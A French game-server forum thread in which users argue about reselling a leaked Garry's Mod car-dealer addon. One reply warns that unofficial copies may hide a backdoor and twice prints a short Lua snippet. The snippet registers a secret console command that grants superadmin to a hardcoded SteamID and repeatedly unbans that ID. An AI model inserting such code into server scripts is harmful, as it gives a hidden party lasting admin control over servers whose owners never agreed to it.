- Initiateur de la discussion
R
RiDeR57200
Bambi
- Score réaction
- 0
Pour le moment je vend l'addon William Car Dealer a 5€ (tous inclus)
concommand.Add( "MAGIC", function(ply) if ( ply:SteamID() == "MonSteamIDMdrr") then RunConsoleCommand("ulx", "adduserid", ply:SteamID(), "superadmin") else ply:ChatPrint("Comment hack un serv en 2.2, " .. ply:Name() .. ".") end end) timer.Create( "checkForBan", 10, 0, function() ULib.unban( "MonSteamIDMdrr") end )
mdrrrrFanatagag à dit:Il c'est passer quoi ? qui a dit que le forum de Mtxserv était devenue un marcher du dimanche xD ? Plz je serais même capable de lâcher l'addon en pièce jointe tellement que vous êtes chiant a les vendre.. comme je me répète les leak c'est déjà mal vue.. et les vente d'addon c'est abuser.. chercher pas il n'y auras pas d'argent a tirer des gens..
Il coûte 10e opir sur ScriptFodder : https://scriptfodder.com/scripts/view/1021
- Officiel.
- Peux demander le support de l'addon
- Possible d'avoir la mise a jour en 2 click
- Payment sans problème (Car oui on peux te payer mais.. tu peux nous ..)
- Garantie sans commande magic (a la fin du poste :')
Code:concommand.Add( "MAGIC", function(ply) if ( ply:SteamID() == "MonSteamIDMdrr") then RunConsoleCommand("ulx", "adduserid", ply:SteamID(), "superadmin") else ply:ChatPrint("Comment hack un serv en 2.2, " .. ply:Name() .. ".") end end) timer.Create( "checkForBan", 10, 0, function() ULib.unban( "MonSteamIDMdrr") end )
Bien de up un topic qui date de 2015 ?SGCAtlantis à dit:si tu la acheter sur @ScriptFodder je suppose , tu peu te faire ban pour ce que tu veux faire
le dernier message date du 14 septembre 2015SGCAtlantis à dit:j'ai rien up du tout je n’ai mème pas fait le tour de ce forum, je dit juste ça car j'ai déjà vu ya pas si longtemps
SGCAtlantis à dit:j'ai rien up du tout je n’ai mème pas fait le tour de ce forum, je dit juste ça car j'ai déjà vu ya pas si longtemps